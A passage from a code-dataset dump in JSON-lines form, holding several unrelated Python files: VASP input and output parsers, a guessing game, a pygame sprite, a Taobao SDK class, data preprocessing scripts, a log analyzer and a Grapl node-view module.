\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=True, write_sw=False)\n incar.incar_dict.update({'ismear': -5})\n saxis_list = ['001', '100', '110', '111']\n for saxis in saxis_list:\n direction = [int(x) for x in saxis]\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4,\n soc_sw=True, saxis=direction)\n fname = os.path.join(path, 'INCAR_soc{0}'.format(saxis))\n incar.write_incar(fname)\n\n @staticmethod\n def dos(path, base):\n \"\"\"\n For pre-band calculation.\n ISMEAR shoud be 1. (maybe)\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=True)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4, soc_sw=False)\n incar.incar_dict.update({'nelm': 150})\n incar.incar_dict.update({'lorbit': 2})\n incar.incar_dict.update({'ismear': 1})\n incar.incar_dict.update({'sigma': 0.02})\n fname = os.path.join(path, 'INCAR_dos')\n incar.write_incar(fname)\n\n @staticmethod\n def band(path, base):\n \"\"\"\n For band calculation.\n ISMEAR shoud be 1. (maybe)\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=True, write_sw=False)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4, soc_sw=False)\n incar.incar_dict.update({'nelm': 150})\n incar.incar_dict.update({'lorbit': 2})\n incar.incar_dict.update({'ismear': 1})\n incar.incar_dict.update({'sigma': 0.02})\n incar.incar_dict.update({'ediff': 1.0e-6})\n fname = os.path.join(path, 'INCAR_band')\n incar.write_incar(fname)\n\n @staticmethod\n def static(path, base):\n \"\"\"\n For static calculation. (no relaxation)\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n incar.switch_mae_calc_condition(mae_sw=False, lmaxmix=4, soc_sw=False)\n incar['isym'] = 0\n fname = os.path.join(path, 'INCAR_static')\n incar.incar_dict.update({'encut': 400})\n incar.write_incar(fname)\n\n @staticmethod\n def make_potcar_kpoints(path, relax=0.15, soc=0.11):\n \"\"\"\n POTCAR and KPOINTS files are made from POSCAR condition.\n \"\"\"\n poscar = Poscar(os.path.join(path, 'POSCAR'))\n potcar = Potcar(poscar.elements)\n kpoints_relax = Kpoints(poscar.get_lattice_length(), relax)\n kpoints_reduc = Kpoints(poscar.get_lattice_length(), relax*2)\n kpoints_soc = Kpoints(poscar.get_lattice_length(), soc)\n potcar.write_potcar(path)\n kpoints_relax.write_kpoints(os.path.join(path, 'KPOINTS_relax'))\n kpoints_reduc.write_kpoints(os.path.join(path, 'KPOINTS_relax_reduced'))\n kpoints_soc.write_kpoints(os.path.join(path, 'KPOINTS_soc'))\n\n\nclass Oszicar(object):\n \"\"\"\n OSZICARからのデータ収集\n \"\"\"\n def __init__(self, fname='OSZICAR'):\n self.results = self.get_results(fname)\n\n @staticmethod\n def get_3values(line):\n \"\"\"\n 行内からnswとenergyとmagの3つの値をreturnする\n splitした行の長さからmagmomが3次元かスカラーかを判断\n \"\"\"\n nsw_num = float(line.split()[0])\n energy = float(line.split()[2])\n if len(line.split()) == 10:\n mag = float(line.split()[9])\n mag = math.fabs(mag)\n elif len(line.split()) == 12:\n mag = [float(x) for x in line.split()[9:12]]\n mag = np.linalg.norm(mag)\n else:\n mag = 0\n return nsw_num, energy, mag\n\n @classmethod\n def get_results(cls, fname='OSZICAR'):\n \"\"\"\n iterationの回数、nswの数、energy、magをdict形式でreturn\n 緩和毎にlistに追加する\n \"\"\"\n\n lines = Cabinet.read_file(fname)\n keywords = r\"\\s*([\\d]+)\\s+F=\\s*([\\d\\-\\.E\\+]+)\\s+E0=\\s+.*\\s+\"\n meta = re.compile(keywords)\n keywords2 = r\"\\s*DAV:\\s*([\\d]+)\\s+.*\"\n meta2 = re.compile(keywords2)\n results = []\n for i in range(0, len(lines)):\n if meta.match(lines[i]):\n relax_num, energy, mag = cls.get_3values(lines[i])\n j = 1\n while not meta2.match(lines[i-j]):\n j += 1\n iter_num = lines[i-j].split()[1]\n results.append({'iter_num': iter_num, 'nsw_num': relax_num,\n 'energy': energy, 'mag': mag})\n if not results:\n last_val = lines[-1].split()\n if math.fabs(float(last_val[3])) > 1e-5:\n print(\"{0} is unfinished with error. \".format(fname))\n return []\n print(\"{0} is unfinished but converged. \"\n \"(val. of mag is false)\".format(fname))\n results.append({'iter_num': int(last_val[1]), 'nsw_num': 1,\n 'energy': float(last_val[2]), 'mag': -100})\n return results\n\n\nclass Outcar(object):\n \"\"\"\n OUTCARからのデータ修得\n \"\"\"\n def __init__(self, fname='OUTCAR'):\n self.results = self.get_results(fname)\n\n def get_results(self, fname='OUTCAR'):\n \"\"\"\n energy, magの値を修得\n \"\"\"\n lines = Cabinet.read_file(fname)\n energy = self.get_energy(lines)\n mag = self.get_mag(lines)\n elements = self.get_elements(lines)\n\n results = {'energy': energy, 'mag': mag, 'elements': elements}\n return results\n\n @staticmethod\n def get_mag(lines):\n \"\"\"\n magnetic momentを読む\n \"\"\"\n key = (r\"\\s*tot\\s+[\\d\\-\\.]+\\s+[\\d\\-\\.]+\"\n r\"\\s+[\\d\\-\\.]+\\s+([\\d\\-\\.]+)\\s*.*\")\n meta = re.compile(key)\n pos = lines.index(\" magnetization (x)\\n\")\n i = 0\n while not meta.match(lines[pos+i]):\n i += 1\n mag = float(meta.match(lines[pos+i]).group(1))\n mag = math.fabs(mag)\n return mag\n\n @staticmethod\n def get_energy(lines):\n \"\"\"\n energyを読む\n \"\"\"\n key = r\"\\s*free\\s+energy\\s+TOTEN\\s+=\\s+([\\d\\-\\.]+)\\s+eV.*\"\n meta = re.compile(key)\n energy = [meta.match(x).group(1) for x in lines if meta.match(x)]\n energy = float(energy[-1])\n return energy\n\n @staticmethod\n def get_elements(lines):\n \"\"\"\n 元素を読む\n \"\"\"\n key = r\"\\s+VRHFIN\\s+=\\s*(.+):\\s+.*\"\n meta = re.compile(key)\n elements = [meta.match(x).group(1) for x in lines if meta.match(x)]\n return elements\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"module/vaspy.py","file_name":"vaspy.py","file_ext":"py","file_size_in_byte":31622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"235225265","text":" #import random module\n\nimport random\n\n #Implement GuessNumber method\n\ndef GuessNumber():\n\n #Getting input from user\n\n print(\" Guess a number within the range of 5-50. You have five chances to guess it.\")\n\n #Defining the range of numbers that contains the random numbers\n\n number = random.randint(5, 50)\n\n #Innitializing countValue to 5\n\n countValue = 5\n\n #Display the number of guesses\n\n print(\"Chance number\", countValue ,end=\"\")\n\n userGuess = int(input(\"? \"))\n\n #checking whether randomly generated number is the same as userGuess\n\n\n\n while number != userGuess:\n\n if (countValue == 10 or userGuess == number):\n\n #Display warning message to user\n\n print(\"Sorry you have exhausted all your chances...the correct number is \", number)\n\n break;\n\n if userGuess < number:\n\n print(userGuess,\"is too low\") # Providing feedback to user\n\n countValue = countValue + 1 #Increment countValue by 1\n\n print(\"Chance number\", countValue,end=\"\")\n\n userGuess = int(input(\"? \"))\n\n elif userGuess > number:\n\n print(userGuess,\"is too high\") # Providing feedback to user\n # print(\"Chance number\", countValue,end=\"\")\n\n userGuess = int(input(\"? \"))\n\n else:\n\n print (\"you are right! I was thinking of \", userGuess,\"!\")\n\n break\n\n\n #call GuessNumber method\n\n\n\n\nGuessNumber()","sub_path":"The Number.py","file_name":"The Number.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"348169270","text":"import pygame\n\n\nclass Coin(pygame.sprite.Sprite):\n def __init__(self, x, y, img_file):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load(img_file).convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.state = \"SPIN\"\n self.spin_sprite = [\"assets/Sprites/goldCoin1.png\", \"assets/Sprites/goldCoin2.png\",\n \"assets/Sprites/goldCoin3.png\", \"assets/Sprites/goldCoin4.png\", \"assets/Sprites/goldCoin5.png\",\n \"assets/Sprites/goldCoin6.png\", \"assets/Sprites/goldCoin7.png\", \"assets/Sprites/goldCoin8.png\",\n \"assets/Sprites/goldCoin9.png\"]\n self.spin_index = 0\n\n def move(self):\n self.rect.x -= 20\n\n def spin(self):\n '''\n this method spins the coin\n :param = None\n :returns = None\n '''\n x = self.rect.x\n y = self.rect.y\n self.image = pygame.image.load(self.spin_sprite[self.spin_index]).convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n # where im getting the error\n self.spin_index = (self.spin_index+1) % len(self.spin_sprite)\n\n def position(self):\n '''\n this method returns the positon of the sprite to a text file\n :param = None\n :returns = None\n '''\n positionref = open(\"position.txt\",\"w\")\n self.current_state = \" Position of Coin (x,y) = \"+ \"(\"+ str(self.rect.x)+\",\"+ str(self.rect.y)+\")\"\n positionref.write(self.current_state)\n positionref.close()\n","sub_path":"src/coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"27094586","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: set ts=4 sts=4 sw=4 et:\n\n\n## @brief 视频播放信息\n# @author wuliang@maimiaotech.com\n# @version: 0.0.0\n\nfrom copy import deepcopy\nfrom datetime import datetime\nimport os\nimport sys\nimport time\nimport types\n\n_jsonEnode = None\ntry:\n import demjson\n _jsonEnode = demjson.encode\nexcept Exception:\n try:\n import simplejson\n except Exception:\n try:\n import json\n except Exception:\n raise Exception(\"Can not import any json library\")\n else:\n _jsonEnode = json.dumps\n else:\n _jsonEnode = simplejson.dumps\n\ndef __getCurrentPath():\n return os.path.normpath(os.path.join(os.path.realpath(__file__), os.path.pardir))\n\nif __getCurrentPath() not in sys.path:\n sys.path.insert(0, __getCurrentPath())\n\n\n \nfrom AndroidVlowUrl import AndroidVlowUrl\n\n \n## @brief 视频播放信息\nclass VideoPlayInfo(object):\n def __init__(self, kargs=dict()):\n super(self.__class__, self).__init__()\n\n self.__kargs = deepcopy(kargs)\n \n \n ## @brief android pad兼播放的m3u8列表文件(包含多码率)。适用大于等于3.0版本Android。\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.androidpad_url = None\n \n ## @brief android pad播放的mp4文件列表。适用2.3版本的Android\n #
    \n #
  • \n # Type: AndroidVlowUrl\n #
  • \n #
  • \n # Level: Object\n #
  • \n #
\n self.androidpad_v23_url = None\n \n ## @brief android phone播放的m3u8列表文件(包含多码率,)。适用大于等于3.0版本Android。\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.androidphone_url = None\n \n ## @brief android phone播放的mp4文件列表。适用2.3版本的Android。\n #
    \n #
  • \n # Type: AndroidVlowUrl\n #
  • \n #
  • \n # Level: Object\n #
  • \n #
\n self.androidphone_v23_url = None\n \n ## @brief Flash播放器地址,可直接通过PC浏览器播放\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.flash_url = None\n \n ## @brief ipad播放的m3u8列表文件(包含多码率)\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.ipad_url = None\n \n ## @brief iphone播放的m3u8列表文件(包含多码率)\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.iphone_url = None\n \n ## @brief Web嵌入html代码,可直接嵌入页面中,支持html5的video标签,支持HLS播放协议最终返回m3u8资源,否则返回mp4资源\n #
    \n #
  • \n # Type: String\n #
  • \n #
  • \n # Level: Basic\n #
  • \n #
\n self.web_url = None\n \n self.__init(kargs)\n\n def toDict(self, **kargs):\n result = deepcopy(self.__kargs)\n for key, value in self.__dict__.iteritems():\n if key.endswith(\"__kargs\"):\n continue\n if value == None:\n if kargs.has_key(\"includeNone\") and kargs[\"includeNone\"]:\n result[key] = value\n else:\n continue\n else:\n result[key] = value\n return result\n \n def _newInstance(self, name, value):\n types = self._getPropertyType(name)\n propertyType = types[0]\n isArray = types[1]\n if propertyType == bool:\n if isArray:\n if not value:\n return []\n return [x for x in value[value.keys()[0]]]\n else:\n return value\n elif propertyType == datetime:\n format = \"%Y-%m-%d %H:%M:%S\"\n if isArray:\n if not value:\n return []\n return [datetime.strptime(x, format) for x in value[value.keys()[0]]]\n else:\n return datetime.strptime(value, format)\n elif propertyType == str:\n if isArray:\n if not value:\n return []\n return [x for x in value[value.keys()[0]]]\n else:\n if not isinstance(value, basestring):\n return _jsonEnode(value)\n else:\n return value\n else:\n if isArray:\n if not value:\n return []\n return [propertyType(x) for x in value[value.keys()[0]]]\n else:\n return propertyType(value)\n \n def _getPropertyType(self, name):\n properties = {\n \n \"androidpad_url\": \"String\",\n \n \"androidpad_v23_url\": \"AndroidVlowUrl\",\n \n \"androidphone_url\": \"String\",\n \n \"androidphone_v23_url\": \"AndroidVlowUrl\",\n \n \"flash_url\": \"String\",\n \n \"ipad_url\": \"String\",\n \n \"iphone_url\": \"String\",\n \n \"web_url\": \"String\",\n }\n levels = {\n \n \"androidpad_url\": \"Basic\",\n \n \"androidpad_v23_url\": \"Object\",\n \n \"androidphone_url\": \"Basic\",\n \n \"androidphone_v23_url\": \"Object\",\n \n \"flash_url\": \"Basic\",\n \n \"ipad_url\": \"Basic\",\n \n \"iphone_url\": \"Basic\",\n \n \"web_url\": \"Basic\",\n\n }\n nameType = properties[name]\n pythonType = None\n if nameType == \"Number\":\n pythonType = int\n elif nameType == \"String\":\n pythonType = str\n elif nameType == 'Boolean':\n pythonType = bool\n elif nameType == \"Date\":\n pythonType = datetime\n elif nameType == 'Field List':\n pythonType == str\n elif nameType == 'Price':\n pythonType = float\n elif nameType == 'byte[]':\n pythonType = str\n else:\n pythonType = getattr(\n sys.modules[os.path.basename(\n os.path.dirname(os.path.realpath(__file__))) + \".\" + nameType], \n nameType)\n\n level = levels[name]\n if \"Array\" in level:\n return (pythonType, True)\n else:\n return (pythonType, False)\n \n def __init(self, kargs):\n \n if kargs.has_key(\"androidpad_url\"):\n self.androidpad_url = self._newInstance(\"androidpad_url\", kargs[\"androidpad_url\"])\n \n if kargs.has_key(\"androidpad_v23_url\"):\n self.androidpad_v23_url = self._newInstance(\"androidpad_v23_url\", kargs[\"androidpad_v23_url\"])\n \n if kargs.has_key(\"androidphone_url\"):\n self.androidphone_url = self._newInstance(\"androidphone_url\", kargs[\"androidphone_url\"])\n \n if kargs.has_key(\"androidphone_v23_url\"):\n self.androidphone_v23_url = self._newInstance(\"androidphone_v23_url\", kargs[\"androidphone_v23_url\"])\n \n if kargs.has_key(\"flash_url\"):\n self.flash_url = self._newInstance(\"flash_url\", kargs[\"flash_url\"])\n \n if kargs.has_key(\"ipad_url\"):\n self.ipad_url = self._newInstance(\"ipad_url\", kargs[\"ipad_url\"])\n \n if kargs.has_key(\"iphone_url\"):\n self.iphone_url = self._newInstance(\"iphone_url\", kargs[\"iphone_url\"])\n \n if kargs.has_key(\"web_url\"):\n self.web_url = self._newInstance(\"web_url\", kargs[\"web_url\"])\n","sub_path":"TaobaoSdk/Domain/VideoPlayInfo.py","file_name":"VideoPlayInfo.py","file_ext":"py","file_size_in_byte":12409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"283777027","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport preprocessing as pp\n\n\n#%%\n# Load submission file\n\n#submission = pp.loadCSV(\"submission.txt\", sep =\"\\t\")\n#submission.drop('prediction', axis=1, inplace=True)\n\n#%% \n\ndef buildInputDeep(X):\n X['DATE'] = pd.to_datetime(X['DATE']) \n X[\"DAY_OFF\"] = X['DATE'].apply(lambda x : pp.isFerie(x)).astype(int)\n \n X['WEEK_END'] = X['DATE'].apply(lambda x: x.dayofweek>=5)\n \n X = pp.parseDate(X,drop = False)\n print(\"DateTime data parsed.\")\n\n #transform categorical data in one-hots\n X = pp.oneHot(X, \"ASS_ASSIGNMENT\", delCol = True)\n\n X.drop('YEAR', axis=1, inplace=True)\n X = pp.oneHot(X, \"MONTH\", delCol = True, prefix=\"MONTH\")\n \n X.drop('DAY', axis=1, inplace=True)\n #X_train = oneHot(X_train, \"DAY\", delCol = True, prefix=\"DAY\")\n \n X = pp.oneHot(X, \"CRENEAU\", delCol = True, prefix=\"CRENEAU\")\n print(\"Categorical data made into one-hot\") \n \n X.drop('DATE', axis=1, inplace=True)\n l = list(X)\n \n X = X.as_matrix()\n nInputDim = X.shape[1]\n nInputNumber = X.shape[0]\n XZ = np.zeros((nInputNumber,1, nInputDim))\n\n for i in range(nInputNumber):\n for k in range(nInputDim):\n XZ[i,0,k]=X[i,k]\n \n print(\"Data converted to numpy array\")\n print(\"PREPROCESSING OVER\")\n return XZ\n\n\n#%%\n\ndef buildInput():\n \n #Only DATE and ASSIGNEMENT\n \n submission = pp.loadCSV(\"submission.txt\", sep =\"\\t\")\n submission.drop('prediction', axis=1, inplace=True)\n \n X = submission\n \n X['DAY_OFF']= 0\n X['DATE'] = pd.to_datetime(X['DATE'])\n # Setting the dates 3 days earlier. \n X[\"DATE\"] = X[\"DATE\"].apply(lambda x: x+pd.DateOffset(days=-3))\n \n X['WEEK_END'] = X['DATE'].apply(lambda x: x.dayofweek>=5)\n \n X = pp.parseDate(submission,drop = False)\n \n \n X = pp.oneHot(X, \"ASS_ASSIGNMENT\", delCol = True)\n #X = pp.oneHot(X, \"YEAR\", delCol = True, prefix=\"YEAR\")\n X.drop('YEAR', axis=1, inplace=True)\n \n X['MONTH_1']= 0\n X = pp.oneHot(X, \"MONTH\", delCol = True, prefix=\"MONTH\")\n \n \n X.drop('DAY', axis=1, inplace=True)\n #X = pp.oneHot(X, \"DAY\", delCol = True, prefix=\"DAY\")\n \n X = pp.oneHot(X, \"CRENEAU\", delCol = True, prefix=\"CRENEAU\")\n\n X.drop('DATE', axis=1, inplace=True)\n \n \n return X\n \n#%% \n\n#Put predicted values into Y\ndef writeSubmissionFile(Y):\n \n submission = pp.loadCSV(\"submission.txt\", sep =\"\\t\")\n submission[\"prediction\"] = Y\n submission = submission.as_matrix()\n\n np.savetxt('submission-test.txt', submission,delimiter='\\t',fmt = ('%s','%s','%s'),header = \"DATE\"+\"\\t\"+\"ASS_ASSIGNMENT\"+\"\\t\"+\"prediction\",comments='')\n \n \n","sub_path":"submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"30601311","text":"class Solution:\n\tdef compressStr(test):\n\t\t\tresult = ''\n\t\t\tsize = len(test)\n\t\t\tcount = 1\n\t\t\tprevious = test[0]\n\t\t\tfor i in range(size):\n\t\t\t\tcurrent = test[i]\n\t\t\t\tif(current == previous):\n\t\t\t\t\tcount += 1\n\t\t\t\telse:\n\t\t\t\t\tresult += previous + str(count)\n\t\t\t\t\tcount = 1\n\t\t\t\t\tprevious = current\n\t\t\treturn result\n\n\n\tif __name__ == '__main__':\n\t\ttest = \"aabbb\"\n\t\tprint(compressStr(test))\n\n","sub_path":"ctci/python/chapter1/Solution_1_5.py","file_name":"Solution_1_5.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"134219135","text":"#!/usr/bin/env python\n\n## /scratch/gpfs/jiazeh/inversion_test2/zplot_signals_load_su.py\n## load data to plot one signal from adj, obs, and syn \n\n### created on Wed Dec 12 10:51:11 EST 2018\n### created by Jiaze He \n\n### per iteration, per event, syn, obs, adj loading\n\n#data_para = para_struct('data_para')\n#data_para.filenamelist = glob.glob(INPUT_path + \"*Up*\")\n\n#directory_list = list()\n#for root, dirs, files in os.walk(INPUT_path, topdown=False):\n# for name in files:\n# directory_list.append(os.path.join(root, name))\n\n#print directory_list\n\n#priny('INPUT_path', INPUT_path)\n#print(data_para.filenamelist)\n#filenamelist = [syn, obs, adj]\n#for f in data_para.filenamelist:\n# fhead=(f[len(INPUT_path)+1:len(INPUT_path)+4])\n# print(fhead)\nINPUT_adj_file = INPUT_path + 'adj/%06d/Up*' % source_num\nstream = read(INPUT_adj_file,format='SU', byteorder='<')\n # convert stream to image array\ndata = _convert_to_array(stream)\nadict = {}\nadict[INPUT_adj_file[:2]] = data\n#adict['pkt_np_array'] = data\nadict['whatever'] = 1 \nadj_data = np.asarray(data)\n\n#print('INPUT_adj_file',INPUT_adj_file)\n#print('shape of adj_data', adj_data.shape)\n\n\nINPUT_syn_file = INPUT_path + 'syn/%06d/Up*' % source_num\nstream = read(INPUT_syn_file,format='SU', byteorder='<')\n # convert stream to image array\ndata = _convert_to_array(stream)\nadict = {}\nadict[INPUT_adj_file[:2]] = data\n#adict['pkt_np_array'] = data\nadict['whatever'] = 1 \nsyn_data = np.asarray(data)\n\n#print('INPUT_syn_file',INPUT_syn_file)\n#print('shape of syn_data', syn_data.shape)\n\n\n\n\n# if fhead=='syn':\n#\n# print('is'+ fhead)\n# syn_data = np.asarray(data)\n# print('shape of Ux_data:', syn_data.shape)\n# #np.save(npfile,Ux_data)\n# elif fhead=='obs':\n# print('is'+ fhead)\n# obs_data = np.asarray(data)\n# print('shape of Uz_data:', obs_data.shape)\n# #np.save(npfile,Uz_data)\n# elif fhead=='adj':\n# print('is'+ fhead)\n# adj_data = np.asarray(data)\n# print('shape of Up_data:', adj_data.shape)\n# #np.save(npfile,Uz_data)\n \n\n\n\n","sub_path":"my_inversion_test/zplot_signals_load_su.py","file_name":"zplot_signals_load_su.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"9395014","text":"from models import Company,transaction\nimport os, sys ,glob ,json,re\nimport time,ijson\nfrom collections import Counter\nclass Util:\n '''this is the class responsible for all the donkey work and lifting the load'''\n def __init__(self ,path,date):\n self.filepath = path\n self.filename=''\n self.filelist=[]##list of all the log files to be used\n self.companies=[]#list of all companies that will be converted to json\n self.jsondirpath=os.path.join(self.filepath)\n self.tempobject={} #store the transactions temporarily\n self.obj={}#an object that is going to represent a key value pair for the key and name of company that key belongs to\n self.names=[]\n self.date=date\n self.pattern='^request\\.log\\.({0})'.format(self.date) #pattern used throughout for filtering by date\n\n\n\n\n\n def getfile(self,filepath):\n '''the method responsible for taking the file path from the input and extracting\n which will be used to create the json'''\n\n pathparts=filepath.split('/')\n filename=pathparts[-1]\n return filename\n def filelister(self,path):\n '''it searched through all the files in the directory and list then one by one'''\n\n files=glob.glob(os.path.join(path,\"*\"))##find another way if possible\n filteredfiles=[]\n for f in files:\n file=self.getfile(f)\n match = re.match(self.pattern,file)\n if match!=None:\n filteredfiles.append(os.path.join(self.filepath,file))\n else:\n pass\n\n\n return filteredfiles\n\n def obj_dict(self,obj):\n return obj.__dict__\n ##convert the file to json\n def fileconverter(self):\n files=self.filelister(self.filepath)\n for file in files:\n os.rename(file,os.path.join(\"{0}.json\".format(file)))\n\n def cleanup(self):\n ##remove the json extension of log files\n files=self.filelister((self.filepath))\n for file in files:\n ext=file.split('.')[-1]\n\n if ext=='json':\n filename,fileext=os.path.splitext(file)\n os.rename(file,filename)\n else:\n pass\n\n\n def progressCalculator(self, load,counter,message):\n '''this is our progress method to be called whenver we need to show a bit progress to the user'''\n\n progress=((counter/len(load))*100)\n if progress != 100:\n\n print( \"{0}...{1}%\".format(message,int(progress)))\n sys.stdout.write(\"\\033[F\") # Cursor up one line\n time.sleep(1)\n else:\n print(\"DONE...:)\")\n sys.stdout.write(\"\\033[F\") # Cursor up one line# #\n time.sleep(1)\n def jsonFileReader(self):\n ''''this is the slave method for xtracting json objects into company information to be used\n for stats calculation\n '''\n files=self.filelister(self.jsondirpath)\n counter=0\n message=\"analyzing data\"\n count=Counter()\n for file in files:\n filename=self.getfile(file)\n match=re.match(self.pattern,filename) # check first if the file is a request file for the date stated\n if match!=None:\n\n '''this results in a string collections of all object lines in the file making it easy for us to look through the linees and convert then to objects we can wwork with'''\n\n\n print(\"working on files {0} of {1}:{2}) \\n\".format(counter+1,len(files),file))\n\n with open(file,'r')as jsonfile:\n jsonlines=(json.loads(line) for line in jsonfile)\n for row in jsonlines:\n key=row['key']\n type=row['type']\n co=Company(key)\n count[key,type]+=1\n transa=transaction(key)\n transa.type=type\n co.transactions.append(transa)\n if self.companies==0:\n self.companies.append(co)\n self.tempobject[co.key]\n else:\n if any(comp for comp in self.companies if comp.key ==co.key):\n pass\n else:\n self.companies.append(co)\n self.tempobject[co.key]=co.transactions\n translist=self.tempobject[co.key]\n if any(tr for tr in translist if tr.type == transa.type):\n pass\n else:\n translist.append(transa)\n\n\n\n for key in self.tempobject:#find all keys.json\n for i in range(len(self.companies)):\n '''looop through the company list and add the transactions from the transactions llist'''\n if self.companies[i].key==key:\n self.companies[i].name=self.obj[key]\n self.companies[i].transactions=self.tempobject[key]\n transactions=self.companies[i].transactions\n for j in range(len(transactions)):\n if transactions[j].type== 'TILE':\n transactions[j].usage=int((count[(key,transactions[j].type)])/32)\n else:\n transactions[j].usage = (count[(key, transactions[j].type)])\n\n\n else:\n pass\n self.progressCalculator(files,counter,message)\n counter+=1\n ''''''\n '''write the companies to a json file'''\n\n f=open('report.json','w+')\n jsonstring=json.dumps(self.companies,default=self.obj_dict)\n f.write(jsonstring)\n def keyreader(self,path):\n##read all the keys in the keys.json file\n with open(os.path.join('{0}/keys.json').format(path)) as f:\n data=ijson.items(f,'')\n for obj in data:\n keys=list(obj.keys())\n for key in keys:\n self.obj[key]=obj[key]['name']\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"444982711","text":"import json\nfrom grapl_analyzerlib.prelude import (\n AssetView,\n BaseView,\n ProcessView,\n FileView,\n IpConnectionView,\n NetworkConnectionView,\n IpPortView,\n IpAddressView,\n ProcessOutboundConnectionView,\n ProcessInboundConnectionView,\n)\nfrom grapl_analyzerlib.grapl_client import GraphClient\nfrom grapl_analyzerlib.retry import retry\n\n\ndef view_from_proto(graph_client: GraphClient, node) -> BaseView:\n if node.HasField(\"process_node\"):\n uid = get_uid(graph_client, node.process_node.node_key)\n assert uid\n\n return ProcessView(\n graph_client=graph_client,\n uid=uid,\n node_key=node.process_node.node_key,\n node_types={\"Process\"},\n )\n elif node.HasField(\"file_node\"):\n uid = get_uid(graph_client, node.file_node.node_key)\n\n return FileView(\n graph_client=graph_client,\n uid=uid,\n node_key=node.file_node.node_key,\n node_types={\"File\"},\n )\n elif node.HasField(\"asset_node\"):\n uid = get_uid(graph_client, node.asset_node.node_key)\n\n return AssetView(\n uid, node.asset_node.node_key, graph_client, node_types={\"Asset\"}\n )\n elif node.HasField(\"ip_address_node\"):\n uid = get_uid(graph_client, node.ip_address_node.node_key)\n\n return IpAddressView(\n uid,\n node.ip_address_node.node_key,\n graph_client,\n node_types={\"IpAddress\"},\n )\n elif node.HasField(\"ip_port_node\"):\n uid = get_uid(graph_client, node.ip_port_node.node_key)\n\n return IpPortView(\n uid, node.ip_port_node.node_key, graph_client, node_types={\"IpPort\"}\n )\n elif node.HasField(\"process_outbound_connection_node\"):\n uid = get_uid(graph_client, node.process_outbound_connection_node.node_key)\n return ProcessOutboundConnectionView(\n uid,\n node.process_outbound_connection_node.node_key,\n graph_client,\n node_types={\"ProcessOutboundConnection\"},\n )\n elif node.HasField(\"process_inbound_connection_node\"):\n uid = get_uid(graph_client, node.process_inbound_connection_node.node_key)\n return ProcessInboundConnectionView(\n uid,\n node.process_inbound_connection_node.node_key,\n graph_client,\n node_types={\"ProcessInboundConnection\"},\n )\n elif node.HasField(\"ip_connection_node\"):\n uid = get_uid(graph_client, node.ip_connection_node.node_key)\n return IpConnectionView(\n uid,\n node.ip_connection_node.node_key,\n graph_client,\n node_types={\"IpConnection\"},\n )\n elif node.HasField(\"network_connection_node\"):\n uid = get_uid(graph_client, node.network_connection_node.node_key)\n return NetworkConnectionView(\n uid,\n node.network_connection_node.node_key,\n graph_client,\n node_types={\"NetworkConnection\"},\n )\n\n elif node.HasField(\"dynamic_node\"):\n uid = get_uid(graph_client, node.dynamic_node.node_key)\n\n return BaseView(\n uid,\n node.dynamic_node.node_key,\n graph_client,\n node_types={node.dynamic_node.node_type},\n )\n else:\n raise Exception(f\"Invalid Node Type : {node}\")\n\n\n# Proto nodes don't contain a uid so we have to fetch them. It may make sense to store these uids\n# alongside the proto in the future. This makes constructing from proto relatively expensive.\n@retry()\ndef get_uid(client: GraphClient, node_key: str) -> str:\n with client.txn_context(read_only=True) as txn:\n query = \"\"\"\n query res($a: string)\n {\n res(func: eq(node_key, $a), first: 1) @cascade\n {\n uid,\n }\n }\"\"\"\n res = txn.query(query, variables={\"$a\": node_key})\n res = json.loads(res.json)\n\n if isinstance(res[\"res\"], list):\n if res[\"res\"]:\n return str(res[\"res\"][0][\"uid\"])\n else:\n raise Exception(f\"get_uid failed for node_key: {node_key} {res}\")\n else:\n return 